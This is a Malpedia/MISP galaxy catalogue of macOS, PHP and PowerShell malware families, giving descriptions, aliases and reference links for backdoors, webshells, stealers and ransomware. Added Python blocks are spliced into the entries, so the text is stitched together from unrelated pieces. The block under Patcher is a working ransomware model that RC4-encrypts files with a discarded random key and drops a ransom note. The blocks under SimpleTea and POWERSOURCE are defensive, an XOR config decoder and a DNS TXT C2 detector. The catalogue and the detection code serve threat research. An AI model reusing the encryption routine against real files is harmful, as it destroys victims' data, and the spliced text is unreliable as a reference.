The tag is: misp-galaxy:malpedia="GIMMICK (OS X)"

GIMMICK (OS X) is also known as:

Table 2634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick

https://cybersecuritynews.com/gimmick-malware-attacks/

https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/

Gmera

According to PCrisk, GMERA (also known as the Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app for Mac users.

Two variants are known, detected as Trojan.MacOS.GMERA.A and Trojan.MacOS.GMERA.B. The criminals distribute GMERA to steal various information and upload it to a website under their control.

The tag is: misp-galaxy:malpedia="Gmera"

Gmera is also known as:

  • Kassi

  • StockSteal

Table 2635. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera

https://objective-see.com/blog/blog_0x53.html

https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/

https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/

HiddenLotus

According to Malwarebytes, the HiddenLotus "dropper" is an application named "Lê Thu Hà (HAEDC).pdf", using the old trick of disguising itself as a document, in this case an Adobe Acrobat file.

The tag is: misp-galaxy:malpedia="HiddenLotus"

HiddenLotus is also known as:

Table 2636. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus

https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/

HLOADER

The tag is: misp-galaxy:malpedia="HLOADER"

HLOADER is also known as:

Table 2637. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.hloader

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

iMuler

The threat was multi-stage malware that showed the victim a decoy: a Chinese-language article on the long-running dispute over the Diaoyu Islands, an array of erotic pictures, or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and iMuler was the backdoor, capable of the following operations:

  • capture screenshots

  • exfiltrate files to a remote computer

  • send various information about the infected computer

  • extract ZIP archives

  • download files from a remote computer and/or the Internet

  • run executable files

The tag is: misp-galaxy:malpedia="iMuler"

iMuler is also known as:

  • Revir

Table 2638. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler

https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/

http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html

https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/

JokerSpy

The tag is: misp-galaxy:malpedia="JokerSpy"

JokerSpy is also known as:

Table 2641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.jokerspy

https://www.elastic.co/security-labs/inital-research-of-jokerspy

KANDYKORN

The tag is: misp-galaxy:malpedia="KANDYKORN"

KANDYKORN is also known as:

Table 2642. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.kandykorn

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

Kitmos

The tag is: misp-galaxy:malpedia="Kitmos"

Kitmos is also known as:

  • KitM

Table 2645. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos

https://www.f-secure.com/weblog/archives/00002558.html

Lambert (OS X)

The tag is: misp-galaxy:malpedia="Lambert (OS X)"

Lambert (OS X) is also known as:

  • GreenLambert

Table 2648. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.lambert

https://objective-see.com/blog/blog_0x68.html

MacInstaller

The tag is: misp-galaxy:malpedia="MacInstaller"

MacInstaller is also known as:

Table 2653. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller

https://objective-see.com/blog/blog_0x16.html

MacSpy

The tag is: misp-galaxy:malpedia="MacSpy"

MacSpy is also known as:

Table 2655. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

MacVX

The tag is: misp-galaxy:malpedia="MacVX"

MacVX is also known as:

Table 2656. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx

https://objective-see.com/blog/blog_0x16.html

MaMi

The tag is: misp-galaxy:malpedia="MaMi"

MaMi is also known as:

Table 2657. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami

https://objective-see.com/blog/blog_0x26.html

Mughthesec

The tag is: misp-galaxy:malpedia="Mughthesec"

Mughthesec is also known as:

Table 2660. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec

https://objective-see.com/blog/blog_0x20.html

NetWire

The tag is: misp-galaxy:malpedia="NetWire"

NetWire is also known as:

Table 2661. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.netwire

https://www.intego.com/mac-security-blog/fbi-shuts-down-11-year-old-netwire-rat-malware/

OceanLotus

According to PcRisk, research shows that the OceanLotus backdoor targets macOS computers. The criminals behind it have already used this malware to attack human rights and media organizations, research institutes and maritime construction companies.

The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (the document is likely spread through malspam emails).

The tag is: misp-galaxy:malpedia="OceanLotus"

OceanLotus is also known as:

Table 2662. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/

https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

OSAMiner

The tag is: misp-galaxy:malpedia="OSAMiner"

OSAMiner is also known as:

Table 2665. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer

https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After the fake application was launched, the main window of the fake cracking tool was displayed.

The file encryption process started after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and used it as the key for RC4 encryption of all of the user’s files. It then demanded a ransom in Bitcoin, as instructed in the 'README!.txt' file copied all over the user’s directories.

Despite the instructions being quite thorough, Patcher had no functionality to communicate with a C&C server, so the key never left the victim's machine and its operators had no way to decrypt affected files. The randomly generated key was also too long to be guessed by brute force, leaving the encrypted data unrecoverable in any reasonable amount of time.
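The two facts above (a random 25-character key and no channel to deliver it to the operators) are what make Patcher a wiper in practice. The following is an added example, not Patcher's own code: a textbook RC4, a key generator, a run in which the key only ever lives in a local variable, and the arithmetic behind "too long to brute-force". The alphanumeric key alphabet and the guess rate are assumptions; the page states neither.

```python
"""Why Patcher's victims could not get their files back.

Added example, not Patcher's code: a textbook RC4, a 25-character random key,
and a "ransomware" run that never transmits the key anywhere. Recovery then
depends entirely on brute force, and the key space makes that hopeless.
"""
import math
import secrets
import string
from typing import Dict

# Assumption: alphanumeric key alphabet. The page only says "25-character string".
KEY_ALPHABET = string.ascii_letters + string.digits
KEY_LENGTH = 25


def generate_key(length: int = KEY_LENGTH) -> str:
    """Random key from a CSPRNG; one key is reused for every file, as Patcher did."""
    return "".join(secrets.choice(KEY_ALPHABET) for _ in range(length))


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def encrypt_files(files: Dict[str, bytes], key: str) -> Dict[str, bytes]:
    """Encrypt every file with the same key and drop the ransom note alongside."""
    encrypted = {name: rc4(key.encode(), data) for name, data in files.items()}
    encrypted["README!.txt"] = b"Your files are encrypted. Pay in Bitcoin to get the key."
    return encrypted


def patcher_like_run(files: Dict[str, bytes]) -> Dict[str, bytes]:
    """Model the flaw: the key exists only in this frame and is never sent to a C&C.

    When this function returns, the key is gone for everyone, operators included.
    """
    key = generate_key()
    return encrypt_files(files, key)


def keyspace_bits(length: int = KEY_LENGTH, alphabet_size: int = len(KEY_ALPHABET)) -> float:
    """Entropy of a uniformly random key: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)


def brute_force_years(bits: float, guesses_per_second: float = 1e12) -> float:
    """Worst-case time to enumerate the key space at an assumed guess rate."""
    return (2.0 ** bits) / guesses_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    # Constructed sample files, not taken from any victim.
    victim = {"thesis.docx": b"chapter one", "photo.jpg": bytes(range(256))}
    locked = patcher_like_run(victim)
    print(sorted(locked))                      # note present, plaintext key nowhere
    bits = keyspace_bits()
    print(f"{bits:.1f} bits of key; ~{brute_force_years(bits):.1e} years at 1e12 guesses/s")
```

Even the weak cipher choice does not help a victim here: RC4's known weaknesses need large volumes of keystream under related keys, not a single unknown 25-character key, so the only practical recovery path for any ransomware family is the one Patcher lacked, a key escrowed with the operator.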

The tag is: misp-galaxy:malpedia="Patcher"

Patcher is also known as:

  • FileCoder

  • Findzip

Table 2666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher

http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/

PintSized

A backdoor built as a fork of OpenSSH 6.0 with logging removed and hidden “-P” and “-z” command-line arguments; it contains the string “PuffySSH_5.8p1”.

The tag is: misp-galaxy:malpedia="PintSized"

PintSized is also known as:

Table 2667. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized

https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/

Poseidon (OS X)

A Mythic C2 agent written in Go.

The tag is: misp-galaxy:malpedia="Poseidon (OS X)"

Poseidon (OS X) is also known as:

Table 2670. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.poseidon

https://github.com/MythicAgents/poseidon

Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

The tag is: misp-galaxy:malpedia="Pwnet"

Pwnet is also known as:

Table 2672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet

https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/

Dok

Dok, a.k.a. Retefe, is the macOS version of the Retefe banking trojan. It consists of a code-signed Mach-O dropper, usually malspammed as an app bundle inside a DMG disk image posing as a document. The dropper's primary purpose is to install a Tor client together with a malicious CA certificate and a proxy auto-config (PAC) URL, so that traffic to targeted sites is redirected through the attackers' Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to block access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

The tag is: misp-galaxy:malpedia="Dok"

Dok is also known as:

  • Retefe

Table 2673. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe

https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/

https://www.govcert.admin.ch/blog/33/the-retefe-saga

http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

Silver Sparrow

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s M1 chips but that has so far been distributed without a payload.

The tag is: misp-galaxy:malpedia="Silver Sparrow"

Silver Sparrow is also known as:

Table 2676. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow

https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

SimpleTea (OS X)

SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).

It also shares similarities with POOLRAT (also known as SIMPLESEA), like the supported commands or a single-byte XOR encryption of its configuration. However, the indices of commands are different.

SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.
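A single-byte XOR over the configuration, as described above for SimpleTea and POOLRAT, is cheap to undo without knowing the key. The block below is an added example, not code from either family: it tries all 256 keys, ranks them by how printable the output is, and confirms the winner with a marker one expects in a C2 config. The config string and key are constructed for the demonstration.

```python
"""Recover a single-byte XOR key from an encrypted configuration blob.

Added example (not SimpleTea code): tries all 256 keys, ranks them by how
printable the result is, then confirms with a marker expected in a C2 config.
"""
import string
from typing import List, Optional, Tuple

PRINTABLE = set(string.printable.encode())


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with the same key byte (encrypt and decrypt are identical)."""
    return bytes(b ^ key for b in data)


def printable_ratio(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII; real config text scores near 1.0."""
    if not buf:
        return 0.0
    return sum(1 for b in buf if b in PRINTABLE) / len(buf)


def rank_keys(blob: bytes) -> List[Tuple[int, float]]:
    """Score all 256 candidate keys, best first (ties broken by key value)."""
    scored = [(k, printable_ratio(xor_single_byte(blob, k))) for k in range(256)]
    scored.sort(key=lambda kv: (-kv[1], kv[0]))
    return scored


def recover_config(blob: bytes, marker: bytes = b"http") -> Optional[Tuple[int, bytes]]:
    """Return (key, plaintext) for the best-ranked key whose output contains `marker`.

    The marker check stops a key that merely yields printable garbage from winning.
    """
    for key, _score in rank_keys(blob):
        plain = xor_single_byte(blob, key)
        if marker in plain:
            return key, plain
    return None


# Constructed sample: a made-up config string encrypted with key 0x5A.
# It is not data from a real SimpleTea sample.
SAMPLE_CONFIG = b"c2=https://c2.example.invalid/api;sleep=30;id=0001"
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = xor_single_byte(SAMPLE_CONFIG, SAMPLE_KEY)

if __name__ == "__main__":
    found = recover_config(SAMPLE_BLOB)
    if found is None:
        print("no candidate key produced the marker")
    else:
        key, plain = found
        print(f"key=0x{key:02x} config={plain.decode('ascii', 'replace')}")
```

On a real sample the blob comes from the binary's data section or a dropped file; the marker is whatever the family's config is known to contain (a URL scheme, a delimiter, a field name). Because many keys turn ASCII into other ASCII, printability alone ranks several keys at 1.0, which is why the marker check decides.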

The tag is: misp-galaxy:malpedia="SimpleTea (OS X)"

SimpleTea (OS X) is also known as:

Table 2677. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.simpletea

https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf

SUGARLOADER

The tag is: misp-galaxy:malpedia="SUGARLOADER"

SUGARLOADER is also known as:

Table 2678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.sugarloader

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

Tsunami (OS X)

The tag is: misp-galaxy:malpedia="Tsunami (OS X)"

Tsunami (OS X) is also known as:

Table 2681. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami

https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks

Winnti (OS X)

The tag is: misp-galaxy:malpedia="Winnti (OS X)"

Winnti (OS X) is also known as:

Table 2688. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti

https://401trg.pw/winnti-evolution-going-open-source/

Xloader

Xloader is a rebranding of the Formbook malware (mainly a stealer) and is also available for macOS.

Formbook carries the "magic" value FBNG (FormBook-NG), while Xloader carries the "magic" value XLNG (XLoader-NG). The XLNG magic value is platform-independent.

Not to be confused with apk.xloader or ios.xloader.

The tag is: misp-galaxy:malpedia="Xloader"

Xloader is also known as:

  • Formbook

Table 2693. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/

https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/

https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer

https://twitter.com/krabsonsecurity/status/1319463908952969216

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/

https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/

https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/

https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/

https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption

ZuRu

Malware observed embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites promoted through search engine results. It uses a Python script to perform reconnaissance on the compromised system and pulls additional payload(s).

The tag is: misp-galaxy:malpedia="ZuRu"

ZuRu is also known as:

Table 2696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru

https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html

https://objective-see.com/blog/blog_0x66.html

Ani-Shell

Ani-Shell is a simple PHP shell with features such as a mass mailer, a simple web-server fuzzer, a DoS tool, back connect, bind shell and auto rooter.

The tag is: misp-galaxy:malpedia="Ani-Shell"

Ani-Shell is also known as:

  • anishell

Table 2697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell

http://ani-shell.sourceforge.net/

https://github.com/tennc/webshell/tree/master/php/Ani-Shell

c99shell

C99shell is a PHP backdoor that provides a lot of functionality, for example:

  • run shell commands;

  • download/upload files from and to the server (FTP functionality);

  • full access to all files on the hard disk;

  • self-delete functionality.

The tag is: misp-galaxy:malpedia="c99shell"

c99shell is also known as:

  • c99

Table 2701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.c99

https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html

DEWMODE

FireEye discovered the DEWMODE webshell in mid-December 2020, deployed after exploitation of zero-day vulnerabilities in Accellion’s File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files on the victim machine. It also contains a cleanup function that removes the shell and cleans the Apache log.

The tag is: misp-galaxy:malpedia="DEWMODE"

DEWMODE is also known as:

Table 2702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode

https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf

https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a

Ensikology

The tag is: misp-galaxy:malpedia="Ensikology"

Ensikology is also known as:

  • Ensiko

Table 2703. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology

https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/

p0wnyshell

The tag is: misp-galaxy:malpedia="p0wnyshell"

p0wnyshell is also known as:

  • Ponyshell

  • Pownyshell

Table 2704. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.p0wnyshell

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Parrot TDS WebShell

Avast's Decoded blog observed a classic web shell used in combination with Parrot TDS.

The tag is: misp-galaxy:malpedia="Parrot TDS WebShell"

Parrot TDS WebShell is also known as:

Table 2705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.parrot_tds_shell

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

Prometheus Backdoor

Backdoor written in PHP.

The tag is: misp-galaxy:malpedia="Prometheus Backdoor"

Prometheus Backdoor is also known as:

Table 2707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.prometheus_backdoor

https://blog.group-ib.com/prometheus-tds

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

RedHat Hacker WebShell

The tag is: misp-galaxy:malpedia="RedHat Hacker WebShell"

RedHat Hacker WebShell is also known as:

Table 2708. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker

https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp

Silence DDoS

The tag is: misp-galaxy:malpedia="Silence DDoS"

Silence DDoS is also known as:

Table 2710. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos

https://www.group-ib.com/resources/threat-research/silence.html

BlackSun

Ransomware.

The tag is: misp-galaxy:malpedia="BlackSun"

BlackSun is also known as:

Table 2711. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.blacksun

https://blogs.vmware.com/security/2022/01/blacksun-ransomware-the-dark-side-of-powershell.html

FRat Loader

Loader used to deliver FRat (see family windows.frat)

The tag is: misp-galaxy:malpedia="FRat Loader"

FRat Loader is also known as:

Table 2715. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader

https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

Lazyscripter

The tag is: misp-galaxy:malpedia="Lazyscripter"

Lazyscripter is also known as:

Table 2719. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lazyscripter

https://github.com/SrujanKumar-K/Blogpost/tree/main/LazyScripter

LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

The tag is: misp-galaxy:malpedia="LightBot"

LightBot is also known as:

Table 2720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot

https://twitter.com/VK_Intel/status/1329511151202349057

https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is distinct from the malware win.octopus, which is written in Delphi and attributed to DustSquad by Kaspersky.

The tag is: misp-galaxy:malpedia="Octopus (Powershell)"

Octopus (Powershell) is also known as:

Table 2721. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus

https://isc.sans.edu/diary/26918

https://github.com/mhaskar/Octopus

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf

https://isc.sans.edu/diary/rss/28628

PowerHarbor

PowerHarbor is modular PowerShell-based malware. The primary module keeps constant communication with the C2 server, executing and then deleting the additional modules it receives. Communication with the C2 server is encrypted with RSA using hardcoded key data, and the main module also includes virtual machine (VM) detection. The StealData module is built around the Invoke-Stealer function and steals system information, browser-stored credentials, cryptocurrency wallet details and credentials for applications such as Telegram, FileZilla and WinSCP.

The tag is: misp-galaxy:malpedia="PowerHarbor"

PowerHarbor is also known as:

Table 2726. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerharbor

https://insight-jp.nttsecurity.com/post/102ignh/steelcloverpowerharbor

POWERPLANT

POWERPLANT is a PowerShell backdoor used by FIN7. According to Mandiant's blog article, it is a "vast backdoor framework with a breadth of capabilities, depending on which modules are delivered from the C2 server."

The tag is: misp-galaxy:malpedia="POWERPLANT"

POWERPLANT is also known as:

Table 2729. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerplant

https://www.mandiant.com/resources/evolution-of-fin7

powershell_web_backdoor

The tag is: misp-galaxy:malpedia="powershell_web_backdoor"

powershell_web_backdoor is also known as:

Table 2730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor

https://github.com/chrisjd20/powershell_web_backdoor

POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or in Alternate Data Streams.
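A backdoor that tasks itself over DNS TXT records leaves a distinctive footprint in resolver logs: one client, one registered domain, a steady stream of TXT queries whose subdomain labels never repeat, and answers far larger than the TXT records of normal mail or verification lookups. The block below is an added example, not POWERSOURCE code or FireEye's detection: it parses constructed resolver log lines in an assumed format and flags that pattern. The thresholds and the two-label registered-domain rule are assumptions.

```python
"""Spot DNS TXT command-and-control in resolver logs.

Added example, not POWERSOURCE code: a backdoor using DNS TXT requests for C2
shows up as one client hitting one domain with many TXT queries, unique
subdomain labels and unusually large answers.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple


class Query(NamedTuple):
    ts: datetime
    client: str
    qname: str
    qtype: str
    answer_len: int


# Constructed log lines in an assumed format: "<iso time> <client> <qname> <qtype> <answer bytes>".
SAMPLE_LOG = """\
2017-03-01T10:00:01Z 10.0.0.5 www.example.com A 16
2017-03-01T10:00:02Z 10.0.0.5 _dmarc.example.com TXT 80
2017-03-01T10:00:03Z 10.0.0.7 a1f3c9.c2-example.net TXT 412
2017-03-01T10:00:08Z 10.0.0.7 9be02d.c2-example.net TXT 398
2017-03-01T10:00:13Z 10.0.0.7 77d4e1.c2-example.net TXT 405
2017-03-01T10:00:18Z 10.0.0.7 0c5a88.c2-example.net TXT 390
2017-03-01T10:00:23Z 10.0.0.7 e3b1f0.c2-example.net TXT 401
2017-03-01T10:00:30Z 10.0.0.9 mail.example.org MX 40
"""


def parse_log(text: str) -> List[Query]:
    """Parse the assumed five-column format; adapt this for your resolver's real layout."""
    queries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, size = line.split()
        queries.append(Query(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                             client, qname.lower().rstrip("."), qtype.upper(), int(size)))
    return queries


def registered_domain(qname: str) -> str:
    """Last two labels. Assumption: no public-suffix handling (co.uk etc. need a PSL)."""
    return ".".join(qname.split(".")[-2:])


def find_txt_beacons(queries: List[Query], min_queries: int = 5,
                     min_unique_ratio: float = 0.8, min_answer_len: int = 200) -> List[Dict]:
    """Group TXT queries per (client, domain) and flag beacon-shaped groups."""
    groups = defaultdict(list)
    for q in queries:
        if q.qtype == "TXT":
            groups[(q.client, registered_domain(q.qname))].append(q)
    findings = []
    for (client, domain), qs in groups.items():
        if len(qs) < min_queries:
            continue
        unique = {q.qname for q in qs}                       # tasking subdomains rarely repeat
        mean_len = sum(q.answer_len for q in qs) / len(qs)   # encoded commands are big
        if len(unique) / len(qs) < min_unique_ratio or mean_len < min_answer_len:
            continue
        qs.sort(key=lambda q: q.ts)
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(qs, qs[1:])]
        findings.append({"client": client, "domain": domain, "queries": len(qs),
                         "unique_names": len(unique), "mean_answer_len": round(mean_len),
                         "mean_gap_s": round(sum(gaps) / len(gaps), 1)})
    return findings


if __name__ == "__main__":
    for finding in find_txt_beacons(parse_log(SAMPLE_LOG)):
        print(finding)
```

The single _dmarc TXT lookup in the sample stays below the query threshold, which is the point of counting per domain rather than alerting on TXT queries alone; on a real network, also feed the flagged client to a host triage that checks the registry run keys and Alternate Data Streams the entry names as POWERSOURCE's install locations.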

The tag is: misp-galaxy:malpedia="POWERSOURCE"

POWERSOURCE is also known as:

Table 2733. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

PowerSpritz

The tag is: misp-galaxy:malpedia="PowerSpritz"

PowerSpritz is also known as:

Table 2734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

The tag is: misp-galaxy:malpedia="POWERSTATS"

POWERSTATS is also known as:

  • Valyria

Table 2735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats

